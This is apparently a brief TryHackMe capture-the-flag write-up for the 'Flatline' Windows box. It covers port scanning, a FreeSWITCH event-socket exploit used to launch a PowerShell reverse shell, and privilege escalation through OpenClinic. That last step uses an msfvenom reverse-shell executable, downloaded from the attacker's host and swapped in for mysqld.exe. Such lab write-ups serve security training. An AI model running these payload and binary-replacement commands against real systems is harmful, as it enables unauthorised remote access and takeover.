CTF Flatline

CTFTryHackMe

nmap

1
nmap -sV -p- -Pn -T4 flatline.thm

Port 3389

3389/tcp open ms-wbt-server Microsoft Terminal Services

Certificate


I’m searching on google but there is nothing interesting.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp

Port 8021

8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Google:
https://www.exploit-db.com/exploits/47799

The exploit give nothing but it he say Authenticated.

SI decided to execute a revershell.
https://www.revshells.com/
With the PowerShell #3 (Base64)


First flag

1
C:\Users\Nekrotic\Desktop

Openclinic

Interesting

https://www.exploit-db.com/exploits/50448

create the malicious exe file

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4242 -f exe > mysqld_evil.exe

Download it

1
Invoke-WebRequest -Uri "http://10.8.50.167:8000/mysqld_evil.exe" -OutFile "mysqld_evil.exe"

Rename it

1
2
Rename-Item mysqld.exe mysqld.exe.old
Rename-Item mysqld_evil.exe mysqld.exe

Reboot

Listen first then reboot.